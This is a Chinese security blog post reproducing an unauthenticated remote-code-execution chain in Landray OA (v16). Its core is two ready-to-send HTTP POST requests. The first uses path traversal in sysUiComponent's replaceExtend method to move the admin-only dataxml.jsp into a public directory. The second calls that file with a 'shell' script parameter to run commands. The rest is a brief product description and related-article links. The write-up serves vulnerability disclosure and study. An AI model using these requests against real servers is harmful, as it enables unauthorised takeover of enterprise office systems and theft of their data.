[漏洞复现]蓝凌OA配合文件移动实现前台RCE

最新推荐文章于 2025-05-28 17:49:11 发布
原创 最新推荐文章于 2025-05-28 17:49:11 发布 · 1.9k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全

如果觉得该文章有帮助的,麻烦师傅们可以搜索下微信公众号:良月安全。点个关注,感谢师傅们的支持。

原文有很多师傅已经搬过了,我这里放一个链接:某凌 EKP 前台远程命令执行漏洞分析 - 先知社区 (aliyun.com)

简单来说就是通过sysUiComponent接口的replaceExtend把后台命令执行所在文件dataxml.jsp移动至到前台从而实现前台命令执行。

漏洞简介

蓝凌OA是由深圳市蓝凌软件股份有限公司开发,是一款针对中小企业的移动化智能办公产品 ,融合了钉钉数字化能力与蓝凌多年OA产品与服务经验,能全面满足企业日常办公在线、企业文化在线、客户管理在线、人事服务在线、行政务服务在线等需求。攻击者可以前台RCE获取服务器权限。

影响版本:v16

漏洞复现

文件移动poc

POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
Host: xx.xx.xx.xx
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 401
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
Origin: http://www.baidu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
X-Requested-With: XMLHttpRequest

------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition: form-data; name="method"

replaceExtend
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition: form-data; name="extendId"

../../../../resource/help/km/review/
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition: form-data; name="folderName"

../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51--

dataxml.jsp利用就是老样子

POST /resource/help/kms/knowledge/dataxml.jsp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
Content-Length: 17392
Content-Type: application/x-www-form-urlencoded

s_bean=ruleFormulaValidate&script=shell&returnType=int&modelName=test

LiangYueSec
关注
蓝凌OA WebService 多处 任意文件读取漏洞复现
0xSec
12-13 1573
蓝凌OA webservice服务多处 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
蓝凌OA wechatLoginHelper.do SQL注入漏洞复现
0xSec
02-27 1969
蓝凌OA wechatLoginHelper.do接口处存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
2024-HW最新漏洞整理及相应解决方案(三)
m0_72210904的博客
08-01 754
漏洞是基于部分安全厂家、软件厂商的公众号或官方网站,以及一些非官方渠道等途径整理的HW安全漏洞情报,情报里附含漏洞详情和解决方案。护网期间我将持续更新分享,希望可以在护网期间帮助到大家。
框架漏洞(3)OA
最新发布
m0_73399576的博客
05-28 1040
知识面,决定看到的攻击面有多广。知识链,决定发动的杀伤链有多深。
蓝凌(Landray)OA漏洞常见RCE
热门推荐
qq_53385700的博客
01-12 1万+
蓝凌OA常见RCE的poc
DBShop前台RCE
weixin_30415113的博客
07-31 209
前言 处理重装系统的Controller在判断是否有锁文件后用的是重定向而不是exit,这样后面的逻辑代码还是会执行,导致了数据库重装漏洞RCE。 正文 InstallController.php中除了indexAction大多数的Action都是使用checkInstallStep()来判断系统是否已经安装,但是该方法中判断完后并没有exit,而是return+重定向,这样...
1Panel面板最新前台RCE漏洞(CVE-2024-39911)
棉花糖的博客
07-26 1991
1Panel 是新一代的 Linux 服务器运维管理面板,用户可以通过 Web 图形界面轻松管理 Linux 服务器,实现主机监控、文件管理、数据库管理、容器管理等功能。网站监控功能影响 == 1panel/openresty:1.21.4.3-3-1-focal WAF功能影响
蓝凌OA 文件Copy导致远程代码执行漏洞复现(XVE-2023-18344)
0xSec
07-18 2183
​由于蓝凌OA代码功能模块设计缺陷问题,攻击者可以利用文件复制的方式,将后台脚本功能模块文件复制到无需权限认证的目录下,导致未经过身份认证的攻击者利用后台脚本执行模块,远程命令执行,写入后门文件并获取服务器权限。
蓝凌OA系统 thirdimsyncforkkwebservice 任意文件读取漏洞分析及复现
12-21
内容概要:本文详细分析了蓝凌OA系统的 thirdimsyncforkkwebservice 任意文件读取漏洞。通过 FOFA POC 和 nuclei-poc 漏洞复现工具,展示了攻击者如何利用 SOAP 请求读取服务器上的任意文件。文中提供了完整的复现...
蓝凌OA 文件Copy导致远程代码执行漏洞
weixin_43167326的博客
07-19 651
蓝凌OA是一款高效、可靠的企业协同办公软件,提供了全面的协同办公解决方案。它具有灵活的工作流引擎,可以帮助企业实现流程自动化和信息共享,提高工作效率。蓝凌0A还拥有强大的文档管理功能,支持多人协同编辑、版本控制和权限管理,使团队成员能够更好地协同工作并共享资源。此外,蓝凌0A还具备日程管理、任务分配、邮件通知等功能,帮助用户进行任务管理和沟通协调。蓝凌0A注重用户体验,界面简洁直观,易于上手使用。总之,蓝凌0A是一款功能丰富的企业协同办公软件,能够有效提升企业的工作效率和协同能力。
通达OA前台RCE加EXP任意文件上传+文件包含.py
03-18
通达OA前台RCE加EXP任意文件上传+文件包含 通达OA前台RCE加EXP任意文件上传+文件包含 通达OA前台RCE加EXP任意文件上传+文件包含通达OA前台RCE加EXP任意文件上传+文件包含通达OA前台RCE加EXP任意文件上传+文件包含 通达OA前台RCE加EXP任意文件上传+文件包含
蓝凌OA系统V15.0管理员手册.zip
07-08
适合新接触OA的系统管理员及运维人员使用
启动蓝凌OA项目的全步骤.md
07-11
公司用的oa项目的启动和初始化步骤。
蓝凌oa任意文件读取,RCE
Dalian0的博客
11-03 4708
蓝凌简介:蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业,近期Landray-OA系统被爆出存任意文件读取漏洞和后台rce 漏洞路径: 1.任意文件读取: /sys/ui/extend/varkind/custom.jsp 漏洞验证: burp抓包修改数据包 修改为post请求,路径如图 数据包 POST /sys/ui.
某Office2.02前台RCE分析
include_voidmain的博客
08-15 1255
某Office2.02前台RCE分析
dedecms前台RCE代码审计复现
H4ck111的博客
10-26 1889
一、版本信息 dedecms V5.8.1 cms安装包地址:https://github.com/dedecms/DedeCMS/releases/tag/v5.8.1 成功安装cms后 来到include/common.func.php目录下 的ShowMsg()方法下
漏洞复现蓝凌OA——远程命令执行
LongL_GuYu的博客
07-28 2111
蓝凌OA平台,数字化向纵深发展,正加速构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化,赋能大中型组织的内外协作与管理,支撑商业模式创新与转型发展。由于蓝凌OA代码功能模块设计缺陷问题,攻击者可以利用文件复制的方式,将后台脚本功能模块文件复制到无需权限认证的目录下,导致未经过身份认证的攻击者利用后台脚本执行模块,远程命令执行,写入后门文件并获取服务器权限。
opensns v6.2.0前台RCE漏洞分析
weixin_40484719的博客
10-16 3172
最近准备进一步学习下代码审计,因此打算找些历史漏洞分析学习下。(啥时候我也能挖出前台rce呢 本次漏洞的入口点在于 Application/Weibo/Controller/ShareController.class.php的shareBox方法。 Application/Weibo/Controller/ShareController.class.php share控制器获取外部输入$query,并将它用parse_str解析后交给$array,这里其实就相当于传入了一个数组。接下...
vBulletin 5.x 前台RCE漏洞复现
cynthrial的博客
11-07 663
vBulletin 5.x 前台RCE漏洞复现vBulletin 5.x 前台RCE漏洞复现漏洞原理RCE复现参考 vBulletin 5.x 前台RCE漏洞复现 漏洞原理 本质是一个文件包含漏洞,攻击者可以通过包含文件执行任意php代码。 追踪源码分析 如果get参数传入则赋值给$path,继续追踪path变量 如果path的变量长度大于2则判断是否是gif等文件,是的话则返回404 执行前检查路径 #strpos取“/”在path中的位置,如果有/ 则函数为真,不继续执行 linux中路径只能为
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值